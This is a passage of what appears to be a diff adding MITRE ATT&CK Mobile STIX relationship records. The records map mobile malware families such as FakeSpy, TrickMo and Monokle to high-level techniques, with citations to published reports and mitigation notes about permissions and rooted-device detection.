Retrieved September 15, 2020.", + "url": "https://www.cybereason.com/blog/fakespy-masquerades-as-postal-service-apps-around-the-world" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:31:30.741Z", + "description": "[FakeSpy](https://attack.mitre.org/software/S0509) can collect SMS messages.(Citation: Cybereason FakeSpy)", + "relationship_type": "uses", + "source_ref": "malware--838f647e-8ff8-48bd-bbd5-613cee7736cb", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--c1453cd9-44bb-4dd2-bdbd-eb06a239d38c", + "created": "2022-04-06T15:52:07.805Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-06T15:52:07.805Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--d916f176-a1ca-4a78-9fdd-4058bc28162e", + "target_ref": "attack-pattern--c6a146ae-9c63-4606-97ff-e261e76e8380", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--17558571-7352-470b-b728-0511fb3f699d", + "type": "relationship", + "created": "2019-10-18T15:51:48.484Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2020-06-24T15:02:13.534Z", + "description": "Users should be warned against granting access to accessibility features, and to carefully scrutinize applications that request this 
dangerous permission.", + "relationship_type": "mitigates", + "source_ref": "course-of-action--653492e3-27be-4a0e-b08c-938dd2b7e0e1", + "target_ref": "attack-pattern--d1f1337e-aea7-454c-86bd-482a98ffaf62", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--204e30ed-5e69-400b-a814-b77e10596865", + "created": "2022-04-06T15:50:42.481Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-06T15:50:42.481Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--f58cd69a-e548-478b-9248-8a9af881dc34", + "target_ref": "attack-pattern--08e22979-d320-48ed-8711-e7bf94aabb13", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--75472bf8-c7fd-4fc7-a11e-74189bc23b78", + "type": "relationship", + "created": "2019-10-10T15:17:00.972Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "description": "FlexiSpy. (n.d.). FlexiSpy Monitoring Features. 
Retrieved September 4, 2019.", + "url": "https://www.flexispy.com/en/features-overview.htm", + "source_name": "FlexiSpy-Features" + } + ], + "modified": "2019-10-14T18:08:28.666Z", + "description": "[FlexiSpy](https://attack.mitre.org/software/S0408) can monitor device photos and can also access browser history and bookmarks.(Citation: FlexiSpy-Features)", + "relationship_type": "uses", + "source_ref": "tool--1622fd3d-fcfc-4d02-ac49-f2d786f79b81", + "target_ref": "attack-pattern--e1c912a9-e305-434b-9172-8a6ce3ec9c4a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--022e941f-30c3-45a9-9f6f-36e704b80060", + "created": "2020-04-24T17:46:31.574Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "SecurityIntelligence TrickMo", + "description": "P. Asinovsky. (2020, March 24). TrickBot Pushing a 2FA Bypass App to Bank Customers in Germany. 
Retrieved April 24, 2020.", + "url": "https://securityintelligence.com/posts/trickbot-pushing-a-2fa-bypass-app-to-bank-customers-in-germany/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:44:13.361Z", + "description": "[TrickMo](https://attack.mitre.org/software/S0427) registers for the `SCREEN_ON` and `SMS_DELIVER` intents to perform actions when the device is unlocked and when the device receives an SMS message.(Citation: SecurityIntelligence TrickMo)", + "relationship_type": "uses", + "source_ref": "malware--21170624-89db-4e99-bf27-58d26be07c3a", + "target_ref": "attack-pattern--3775a580-a1d1-46c4-8147-c614a715f2e9", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--fdf06a0b-08d2-4cac-9d49-b3f1454ec4ea", + "created": "2022-03-30T19:32:43.015Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Attestation can detect rooted devices. Mobile security software can then use this information and take appropriate mitigation action. 
Attestation can detect rooted devices.", + "modified": "2022-03-30T19:32:43.015Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--ff4821f6-5afb-481b-8c0f-26c28c0d666c", + "target_ref": "attack-pattern--0cdd66ad-26ac-4338-a764-4972a1e17ee3", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--5c746ac8-4034-4ae3-98c3-66d89f5a6d6a", + "created": "2020-07-27T14:14:56.996Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Google Security Zen", + "description": "Siewierski, L. (2019, January 11). PHA Family Highlights: Zen and its cousins . Retrieved July 27, 2020.", + "url": "https://security.googleblog.com/2019/01/pha-family-highlights-zen-and-its.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T21:19:00.199Z", + "description": "[Zen](https://attack.mitre.org/software/S0494) can inject code into the Setup Wizard at runtime to extract CAPTCHA images. 
[Zen](https://attack.mitre.org/software/S0494) can inject code into the `libc` of running processes to infect them with the malware.(Citation: Google Security Zen)", + "relationship_type": "uses", + "source_ref": "malware--22faaa56-a8ac-4292-9be6-b571b255ee40", + "target_ref": "attack-pattern--1ff89c1b-7615-4fe8-b9cb-63aaf52e6dee", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--c1d78c3d-9ed6-4e3f-9cad-b98b5dfb8ebd", + "created": "2023-03-20T15:40:11.819Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T15:40:11.819Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6", + "target_ref": "attack-pattern--e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--bee919a6-c488-49a0-9848-fff19aa2c276", + "type": "relationship", + "created": "2021-09-24T14:47:34.449Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-04T20:08:48.556Z", + "description": "Mobile security products can often detect rooted devices.", + "relationship_type": "mitigates", + "source_ref": "course-of-action--cf2cccb1-cab8-431a-8ecf-f7874d05f433", + "target_ref": "attack-pattern--ccde43e4-78f9-4f32-b401-c081e7db71ea", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + 
"object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--7c6207c7-d738-4a17-8380-595c86574b64", + "type": "relationship", + "created": "2020-09-11T16:22:03.298Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout ViperRAT", + "url": "https://blog.lookout.com/viperrat-mobile-apt", + "description": "M. Flossman. (2017, February 16). ViperRAT: The mobile APT targeting the Israeli Defense Force that should be on your radar. Retrieved September 11, 2020." + } + ], + "modified": "2020-09-11T16:22:03.298Z", + "description": "[ViperRAT](https://attack.mitre.org/software/S0506) can track the device’s location.(Citation: Lookout ViperRAT)", + "relationship_type": "uses", + "source_ref": "malware--f666e17c-b290-43b3-8947-b96bd5148fbb", + "target_ref": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--3fcd2177-2030-4781-bd19-8b9fa8c6e645", + "type": "relationship", + "created": "2021-02-08T16:36:20.655Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "BlackBerry Bahamut", + "url": "https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-spark-bahamut.pdf", + "description": "The BlackBerry Research & Intelligence Team. (2020, October). BAHAMUT: Hack-for-Hire Masters of Phishing, Fake News, and Fake Apps. Retrieved February 8, 2021." 
+ } + ], + "modified": "2021-05-24T13:16:56.410Z", + "description": "[Windshift](https://attack.mitre.org/groups/G0112) has included phone call and audio recording capabilities in the malicious apps deployed as part of Operation BULL and Operation ROCK.(Citation: BlackBerry Bahamut)", + "relationship_type": "uses", + "source_ref": "intrusion-set--afec6dc3-a18e-4b62-b1a4-5510e1a498d1", + "target_ref": "attack-pattern--6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--d995dfff-e4b2-4e07-8e76-b064354f591a", + "created": "2022-04-01T12:49:32.365Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Calendar access is an uncommonly needed permission, so users should be instructed to use extra scrutiny when granting access to their device calendar. 
", + "modified": "2022-04-01T12:49:32.365Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--653492e3-27be-4a0e-b08c-938dd2b7e0e1", + "target_ref": "attack-pattern--a9fa0d30-a8ff-45bf-922e-7720da0b7922", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--23cac1d7-27ca-4c78-bfa0-2d6023d21798", + "type": "relationship", + "created": "2020-10-29T19:01:13.854Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Microsoft MalLockerB", + "url": "https://www.microsoft.com/security/blog/2020/10/08/sophisticated-new-android-malware-marks-the-latest-evolution-of-mobile-ransomware/", + "description": "D. Venkatesan. (2020, October 8). Sophisticated new Android malware marks the latest evolution of mobile ransomware . Retrieved October 29, 2020." + } + ], + "modified": "2020-10-29T19:01:13.854Z", + "description": "[AndroidOS/MalLocker.B](https://attack.mitre.org/software/S0524) has employed both name mangling and meaningless variable names in source. [AndroidOS/MalLocker.B](https://attack.mitre.org/software/S0524) has stored encrypted payload code in the Assets directory, coupled with a custom decryption routine that assembles a .dex file by passing data through Android Intent objects. 
(Citation: Microsoft MalLockerB)", + "relationship_type": "uses", + "source_ref": "malware--9b86f8c3-33ab-44cf-a66d-c0fd6070e2ce", + "target_ref": "attack-pattern--d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--43a62244-29f1-4f7f-bc9f-9b7b8e488b38", + "type": "relationship", + "created": "2020-05-11T16:37:36.616Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "description": "ThreatFabric. (2019, November). Ginp - A malware patchwork borrowing from Anubis. Retrieved April 8, 2020.", + "url": "https://www.threatfabric.com/blogs/ginp_a_malware_patchwork_borrowing_from_anubis.html", + "source_name": "ThreatFabric Ginp" + } + ], + "modified": "2020-05-11T16:37:36.616Z", + "description": " [Ginp](https://attack.mitre.org/software/S0423) can inject input to make itself the default SMS handler.(Citation: ThreatFabric Ginp) ", + "relationship_type": "uses", + "source_ref": "malware--6146be90-470c-4049-bb3a-9986b8ffb65b", + "target_ref": "attack-pattern--d1f1337e-aea7-454c-86bd-482a98ffaf62", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--82a51cc3-7a91-43b0-9147-df5983e52b41", + "created": "2020-12-14T15:02:35.208Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Securelist Asacub", + "description": "T. Shishkova. (2018, August 28). The rise of mobile banker Asacub. 
Retrieved December 14, 2020.", + "url": "https://securelist.com/the-rise-of-mobile-banker-asacub/87591/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:08:11.798Z", + "description": "[Asacub](https://attack.mitre.org/software/S0540) has communicated with the C2 using HTTP POST requests.(Citation: Securelist Asacub)", + "relationship_type": "uses", + "source_ref": "malware--a76b837b-93cc-417d-bf28-c47a6a284fa4", + "target_ref": "attack-pattern--2282a98b-5049-4f61-9381-55baca7c1add", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--d3e06522-2a30-4d56-801e-9461178b80ce", + "created": "2021-01-05T20:16:20.412Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Zscaler TikTok Spyware", + "description": "S. Desai. (2020, September 8). TikTok Spyware. 
Retrieved January 5, 2021.", + "url": "https://www.zscaler.com/blogs/security-research/tiktok-spyware" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:45:54.913Z", + "description": "[Tiktok Pro](https://attack.mitre.org/software/S0558) can hide its icon after launch.(Citation: Zscaler TikTok Spyware)", + "relationship_type": "uses", + "source_ref": "malware--c6abcaf8-1765-41f8-9fe5-03d42fd0f6c0", + "target_ref": "attack-pattern--f05fc151-aa62-47e3-ae57-2d1b23d64bf6", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--147d82a6-a61a-41d0-8eef-b6193bdd92d6", + "created": "2022-03-30T15:18:21.256Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-03-30T15:18:21.256Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--c5089859-b21f-40a3-8be4-63e381b8b1c0", + "target_ref": "attack-pattern--c6e17ca2-08b5-4379-9786-89bd05241831", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--ce8cc50a-f3c9-4a6a-b6be-f3e8bdd293bd", + "type": "relationship", + "created": "2019-07-10T15:35:43.699Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf", + "description": "Blaich, A., et al. (2018, January 18). 
Dark Caracal: Cyber-espionage at a Global Scale. Retrieved April 11, 2018.", + "source_name": "Lookout Dark Caracal Jan 2018" + } + ], + "modified": "2019-08-09T18:06:11.839Z", + "description": "[Pallas](https://attack.mitre.org/software/S0399) captures audio from the device microphone.(Citation: Lookout Dark Caracal Jan 2018)", + "relationship_type": "uses", + "source_ref": "malware--c41a8b7c-3e42-4eee-b87d-ad8a100ee878", + "target_ref": "attack-pattern--6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--b05668b9-aa06-4191-a4fa-f7e5a7804694", + "type": "relationship", + "created": "2021-01-05T20:16:20.514Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Zscaler TikTok Spyware", + "url": "https://www.zscaler.com/blogs/security-research/tiktok-spyware", + "description": "S. Desai. (2020, September 8). TikTok Spyware. Retrieved January 5, 2021." + } + ], + "modified": "2021-01-05T20:16:20.514Z", + "description": "[Tiktok Pro](https://attack.mitre.org/software/S0558) can list all hidden files in the `/DCIM/.dat/` directory.(Citation: Zscaler TikTok Spyware)", + "relationship_type": "uses", + "source_ref": "malware--c6abcaf8-1765-41f8-9fe5-03d42fd0f6c0", + "target_ref": "attack-pattern--cf28ca46-1fd3-46b4-b1f6-ec0b72361848", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--4a936488-526c-40c1-b2d5-490052cb0e73", + "created": "2020-12-31T18:25:05.162Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "CYBERWARCON CHEMISTGAMES", + "description": "B. Leonard, N. Mehta. 
(2019, November 21). The Secret Life of Sandworms. Retrieved December 31, 2020.", + "url": "https://www.youtube.com/watch?v=xoNSbm1aX_w" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T21:22:53.698Z", + "description": "[CHEMISTGAMES](https://attack.mitre.org/software/S0555) can run bash commands.(Citation: CYBERWARCON CHEMISTGAMES)", + "relationship_type": "uses", + "source_ref": "malware--a0d774e4-bafc-4292-8651-3ec899391341", + "target_ref": "attack-pattern--693cdbff-ea73-49c6-ac3f-91e7285c31d1", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--5619e263-d48c-47a5-ab68-8677fe080a15", + "created": "2022-03-30T14:42:27.821Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-03-30T14:42:27.821Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--3775a580-a1d1-46c4-8147-c614a715f2e9", + "target_ref": "attack-pattern--d446b9f0-06a9-4a8d-97ee-298cfee84f14", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--d54bdaff-8eb8-4a02-9f64-bc33c892e9d1", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Xiao-ZergHelper", + "description": "Claud Xiao. (2016, February 21). 
Pirated iOS App Store’s Client Successfully Evaded Apple iOS Code Review. Retrieved December 12, 2016.", + "url": "http://researchcenter.paloaltonetworks.com/2016/02/pirated-ios-app-stores-client-successfully-evaded-apple-ios-code-review/" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "description": "[ZergHelper](https://attack.mitre.org/software/S0287) attempts to extend its capabilities via dynamic updating of its code.(Citation: Xiao-ZergHelper)", + "relationship_type": "uses", + "source_ref": "malware--3c3b55a6-c3e9-4043-8aae-283fe96220c0", + "target_ref": "attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--d4a5a902-231e-4878-ad5b-39620498b018", + "type": "relationship", + "created": "2019-09-04T14:28:15.941Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "description": "Bauer A., Kumar A., Hebeisen C., et al. (2019, July). Monokle: The Mobile Surveillance Tooling of the Special Technology Center. 
Retrieved September 4, 2019.", + "url": "https://www.lookout.com/documents/threat-reports/lookout-discovers-monokle-threat-report.pdf", + "source_name": "Lookout-Monokle" + } + ], + "modified": "2019-09-04T14:32:12.589Z", + "description": "[Monokle](https://attack.mitre.org/software/S0407) can record audio from the device's microphone and can record phone calls, specifying the output audio quality.(Citation: Lookout-Monokle)", + "relationship_type": "uses", + "source_ref": "malware--6a7aaab1-3e0a-48bb-ba66-bbf7665c0a65", + "target_ref": "attack-pattern--6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--d7ca70d4-2006-4252-b243-e52be760e24d", + "created": "2022-04-01T13:26:39.773Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Access to SMS messages is an uncommonly needed permission, so users should be instructed to use extra scrutiny when granting access to their SMS messages. ", + "modified": "2022-04-01T13:26:39.773Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--653492e3-27be-4a0e-b08c-938dd2b7e0e1", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--980c49f8-d991-4e1f-8feb-6173e3dfca1f", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout-EnterpriseApps", + "description": "Lookout. (2016, May 25). 5 active mobile threats spoofing enterprise apps. 
Retrieved December 19, 2016.", + "url": "https://blog.lookout.com/blog/2016/05/25/spoofed-apps/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:29:18.098Z", + "description": "[AndroRAT](https://attack.mitre.org/software/S0292) captures SMS messages.(Citation: Lookout-EnterpriseApps)", + "relationship_type": "uses", + "source_ref": "malware--a3dad2be-ce62-4440-953b-00fbce7aba93", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--020f79c6-d5f8-49eb-beee-e716e1fa4e80", + "type": "relationship", + "created": "2020-07-20T13:49:03.692Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "TrendMicro-XLoader-FakeSpy", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/new-version-of-xloader-that-disguises-as-android-apps-and-an-ios-profile-holds-new-links-to-fakespy/", + "description": "Hiroaki, H., Wu, L., Wu, L.. (2019, April 2). XLoader Disguises as Android Apps, Has FakeSpy Links. Retrieved July 20, 2020." 
+ } + ], + "modified": "2020-09-24T15:12:24.191Z", + "description": "[XLoader for Android](https://attack.mitre.org/software/S0318) collects the device’s Android ID and serial number.(Citation: TrendMicro-XLoader-FakeSpy)", + "relationship_type": "uses", + "source_ref": "malware--2740eaf6-2db2-4a40-a63f-f5b166c7059c", + "target_ref": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--77efa84c-5ef0-4554-b774-2dbfcca74087", + "type": "relationship", + "created": "2020-10-29T19:20:58.116Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "WeLiveSecurity AdDisplayAshas", + "url": "https://www.welivesecurity.com/2019/10/24/tracking-down-developer-android-adware/", + "description": "L. Stefanko. (2019, October 24). Tracking down the developer of Android adware affecting millions of users. Retrieved October 29, 2020." 
+ } + ], + "modified": "2020-10-29T19:20:58.116Z", + "description": "[Android/AdDisplay.Ashas](https://attack.mitre.org/software/S0525) has checked to see how many apps are installed, and specifically if Facebook or FB Messenger are installed.(Citation: WeLiveSecurity AdDisplayAshas)", + "relationship_type": "uses", + "source_ref": "malware--f7e7b736-2cff-4c2a-9232-352cd383463a", + "target_ref": "attack-pattern--198ce408-1470-45ee-b47f-7056050d4fc2", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--2e7f8995-93ae-41bb-9baf-53178341d93e", + "created": "2021-02-08T16:36:20.630Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "BlackBerry Bahamut", + "description": "The BlackBerry Research & Intelligence Team. (2020, October). BAHAMUT: Hack-for-Hire Masters of Phishing, Fake News, and Fake Apps. 
